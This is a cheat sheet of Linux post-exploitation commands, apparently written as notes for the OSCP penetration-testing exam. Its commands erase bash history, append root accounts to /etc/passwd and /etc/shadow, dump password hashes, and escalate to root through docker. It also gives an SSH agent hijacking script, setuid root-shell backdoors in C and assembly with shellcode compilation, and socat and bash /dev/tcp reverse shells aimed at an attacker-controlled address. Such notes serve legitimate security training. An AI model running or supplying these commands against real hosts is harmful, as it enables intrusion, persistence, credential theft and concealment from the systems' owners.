|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/

Last changed: 08.07.2020

Linux post exploitation

This command list was also part of my notes for the Offensive Security Certified Professional exam. It summarizes some useful methods to gather information on a linux host after having gained command execution.

upgrade shell

To upgrade your shell to a fully functional interactive shell use the following commands

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
reset

bash history

To prevent bash from writing commands after logout you can temporarily unset its HISTFILE or reload the old history before logging out.

unset HISTFILE
history -r

You can also turn off history and delete single entries.

set +o history
history -d -1

If HISTCONTROL is set to ignorespace or ignoreboth command lines beginning with a space will not be written to the history.

login information

A first step should be to determine which privileges you have and how often the system is accessed by other users.

show user privileges

id
whoami
capsh --print

login history

w
who
last
lastlog

failed logins

utpmdump /var/log/btmp
grep -i fail /var/log/auth.log

system information

distro and kernel info

cat /etc/issue
uname -a

hostname

hostname
hostname -f

running tasks

ps aux
pstree
kill -9 1234
killall ...

installed packages

dpkg -l
yum list installed
pacman -Q

environment variables

env

user management

usernames and password hashes

ls -l /home
cat /etc/passwd
echo "admin:`mkpasswd password`:0:0:admin,,,:/tmp:/bin/bash" >> /etc/passwd
cat /etc/shadow
echo "admin:x:0:0:admin,,,:/root:/bin/bash" >> /etc/passwd
echo "admin:`openssl passwd -6 password`:12345:0:99999:7:::" >> /etc/shadow
unshadow passwd shadow > passwd.unshadow

sudo permissions

sudo -l
cat /etc/sudoers

A nice collection of ways to start a shell from another program can be found on https://gtfobins.github.io/.

gain root with docker

docker container run -v /etc:/tmp/etc -i centos /bin/bash

network configuration

network interfaces

ip l
ip a

routes

ip r
ip r l t 0
ip r a 10.1.1.0/24 via 192.168.11.3
netstat -r

dns server

cat /etc/resolv.conf

open ports

netstat -tunap
ss -tunap
netstat -pelt

firewall rules

iptables -L
iptables -A INPUT -p tcp --dport 4444 -j ACCEPT

enable ssh

/etc/init.d/ssh start
service ssh start
systemctl start ssh

network

network scan

for ip in {1..254}; do arping -w1 -c1 192.168.199.$ip ; done

arp cache

arp -n
ip n

active connections

ss -tun
lsof -nPi

download file

curl -i http://1.2.3.4/
wget http://1.2.3.4/tool.zip

traffic dump

tcpdump -i eth0 upd port 53 -w dns.pcap
tshark -r dns.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name

file system

df -h
lsblk -f
mount
mount -o remount,rw,exec /

searching files

grep

grep -rHi "string" /path

find

find /path -type f -exec grep -Hi "string" {} \;
find / -iname *\.bak -perm -004 -ls 2>/dev/null
find / -type f -amin -60 2>/dev/null
find / -type f -writable 2>/dev/null
find / -type d -writable 2>/dev/null
find / -type f -perm /6000 -ls 2>/dev/null

scheduled tasks

list scheduled scripts

ls /etc/cron.*
cat /etc/crontab
crontab -l

add new task

echo "* * * * * root date >> /tmp/log" >> /etc/crontab
crontab -e
crontab -r

ssh agent hijacking

If someone uses ssh agent forwarding and you can access this socket you can use his agent to authenticate.

hijack.sh

#!/bin/bash
while [ ! -e /tmp/ssh* ]; do
        sleep 0.1
done
file=$(ls /tmp/ssh*/* | head -n1)
SSH_AUTH_SOCK="${file}" ssh root@localhost

network file system

create share

systemctl start nfs-server
echo "/srv/nfs_share *(rw, sync, nohide)" >> /etc/exports
exportfs -var

find and mount

nmap -Pn <network> -p 111,2049
showmount -e <target>
mount -t nfs <target>:/nfs_share /mnt/nfs

squashfs

modify squashfs image

unsquashfs image.file
vim squashfs-root/<file_to_change>
mksquashfs squashfs-root/ new_image.file -noappend -always-use-fragments

selfmade backdoors

setuid.c

#include <unistd.h>       
#include <stdlib.h>       

void main(void){          
    setuid(0);            
    system("/bin/sh");  
}

setuid.asm

BITS 32
global _start
section .text
_start:

xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h

xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0bh]
mov ebx,esp
int 80h

compile asm

nasm -f elf setuid.asm
ld -o setuid -melf_i386 setuid.o

compile to shellcode

nasm -f bin setuid.asm -o shellcode
xxd -p shellcode

socat

backdoor

socat tcp-listen:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw
socat tcp-connect:<my_ip>:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw

file transfer

socat -u tcp-listen:4444,reuseaddr open:<filename>,creat
socat -u tcp-connect:<my_ip>:4444 file:<filename>

bash backconnect

The bash offers a pseudo device for creating network connections. The second command is an alternative doing the same as the first.

/bin/bash -i < /dev/tcp/localhost/8888 1>&0 2>&0
/bin/bash -i &> /dev/tcp/localhost/8888 0>&1

xserver backconect

To connect graphical applications to your local xserver you can use Xnest

Xnest :1

or configure x11 to allow inbound tcp connections and reboot.

/etc/gdm/custom.conf

[security]
DisallowTCP=false

In both cases you have to disable access control with

xhost +

On the victim you can start

xterm -display <target-ip>:1